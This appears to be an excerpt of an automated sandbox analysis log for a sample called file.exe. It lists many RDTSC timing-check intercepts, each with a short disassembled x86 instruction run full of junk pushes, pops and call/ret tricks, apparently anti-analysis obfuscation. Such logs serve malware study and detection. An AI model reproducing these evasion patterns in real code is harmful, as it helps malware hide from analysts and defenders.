Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0B2F second address: 9A0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F7F1511CE2Ch 0x0000000f jo 00007F7F1511CE26h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F7F1511CE39h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F7F1511CE31h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0B84 second address: 9A0BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F147AEA4Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0BAB second address: 9A0C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F7F1511CE28h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007F7F1511CE2Bh 0x00000029 lea ebx, dword ptr [ebp+124525E6h] 0x0000002f sbb si, E0C2h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F7F1511CE2Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE59F second address: 9BE5A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5A8 second address: 9BE5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a ja 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5B9 second address: 9BE5CB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5CB second address: 9BE5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5D1 second address: 9BE5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE74B second address: 9BE74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE74F second address: 9BE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE75E second address: 9BE772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jp 00007F7F1511CE26h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE916 second address: 9BE96C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7F147AEA53h 0x00000010 jp 00007F7F147AEA48h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F7F147AEA58h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE96C second address: 9BE972 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BED6C second address: 9BED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BED72 second address: 9BED80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BED80 second address: 9BED84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF1AF second address: 9BF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7200 second address: 9B720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F147AEA46h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B720B second address: 9B7214 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF322 second address: 9BF33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA55h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF33C second address: 9BF353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF353 second address: 9BF360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF360 second address: 9BF366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF366 second address: 9BF375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF375 second address: 9BF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F1511CE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9B8 second address: 9BF9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9BE second address: 9BF9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9C4 second address: 9BF9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9C9 second address: 9BF9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9CF second address: 9BF9ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F7F147AEA55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9ED second address: 9BFA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F7F1511CE26h 0x00000012 jo 00007F7F1511CE26h 0x00000018 popad 0x00000019 jmp 00007F7F1511CE39h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFA1F second address: 9BFA3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFBB4 second address: 9BFBBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFE8A second address: 9BFE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFE90 second address: 9BFEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F7F1511CE26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEA0 second address: 9BFEA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEA6 second address: 9BFEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEAC second address: 9BFEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEB2 second address: 9BFEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C01BE second address: 9C01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C58C2 second address: 9C58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1511CE2Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7D4C second address: 9C7D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C8195 second address: 9C819A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC577 second address: 9CC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC582 second address: 9CC58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F7F1511CE26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC58E second address: 9CC594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC720 second address: 9CC728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC728 second address: 9CC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD133 second address: 9CD139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD208 second address: 9CD20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD20D second address: 9CD271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F7F1511CE2Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 jmp 00007F7F1511CE38h 0x0000001a pop ecx 0x0000001b pop eax 0x0000001c call 00007F7F1511CE2Ah 0x00000021 add di, 37CFh 0x00000026 pop edi 0x00000027 push C4C28538h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7F1511CE32h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD271 second address: 9CD27B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD27B second address: 9CD281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD59E second address: 9CD5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD842 second address: 9CD847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CDCC4 second address: 9CDCC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CDCC8 second address: 9CDCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE1B9 second address: 9CE1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE27A second address: 9CE284 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE284 second address: 9CE289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE289 second address: 9CE2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7F1511CE30h 0x00000010 jmp 00007F7F1511CE2Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE749 second address: 9CE759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 je 00007F7F147AEA4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF183 second address: 9CF187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF22F second address: 9CF234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF234 second address: 9CF24A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1511CE28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jl 00007F7F1511CE2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D0DA0 second address: 9D0DAA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2243 second address: 9D226C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F1511CE31h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1F35 second address: 9D1F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D3B second address: 9D2D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D3F second address: 9D2D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D45 second address: 9D2D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D5F second address: 9D2DD5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+122D28F6h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7F147AEA48h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jmp 00007F7F147AEA51h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F147AEA48h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xor dword ptr [ebp+122D1CB9h], ebx 0x00000054 push eax 0x00000055 push esi 0x00000056 pushad 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38D3 second address: 9D38DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38DC second address: 9D38EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38EE second address: 9D38F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38F2 second address: 9D38F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38F8 second address: 9D397C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7F1511CE26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7F1511CE28h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 pushad 0x0000002a pushad 0x0000002b movzx edx, ax 0x0000002e jmp 00007F7F1511CE2Dh 0x00000033 popad 0x00000034 mov edx, ebx 0x00000036 popad 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D2C98h], esi 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F7F1511CE28h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F7F1511CE2Fh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D397C second address: 9D399A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F147AEA54h 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D399A second address: 9D399F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D399F second address: 9D39A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 992DFA second address: 992E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D8BE1 second address: 9D8BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DABDE second address: 9DABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE39h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DABFC second address: 9DAC06 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9DA5 second address: 9D9E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D5769h], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F7F1511CE28h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov bx, AFBAh 0x00000033 xor edi, 09865B4Ch 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, edi 0x00000042 mov eax, dword ptr [ebp+122D10E5h] 0x00000048 mov bl, A0h 0x0000004a push FFFFFFFFh 0x0000004c mov bx, dx 0x0000004f nop 0x00000050 push ecx 0x00000051 pushad 0x00000052 push ecx 0x00000053 pop ecx 0x00000054 jp 00007F7F1511CE26h 0x0000005a popad 0x0000005b pop ecx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jnc 00007F7F1511CE26h 0x00000066 jmp 00007F7F1511CE2Ah 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBC5F second address: 9DBC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBC65 second address: 9DBC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBE25 second address: 9DBE2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBE2B second address: 9DBE30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDB4C second address: 9DDB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
